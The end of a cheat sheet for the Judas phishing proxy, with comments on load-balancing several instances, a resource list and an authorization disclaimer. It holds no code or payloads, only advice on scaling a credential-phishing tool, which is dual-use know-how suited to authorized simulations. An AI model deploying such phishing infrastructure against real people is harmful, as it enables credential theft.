# Monitor resource usage
# Scale infrastructure as needed
# Example load balancing setup
# Use nginx or HAProxy
# Distribute traffic across multiple Judas instances
# Implement health checksResources
- Judas GitHub Repository
- Go Programming Language
- Reverse Proxy Concepts
- OWASP Phishing Guide
- Let's Encrypt SSL Certificates
This cheat sheet provides a comprehensive reference for using Judas phishing proxy. Always ensure you have proper authorization before conducting phishing simulations or penetration testing.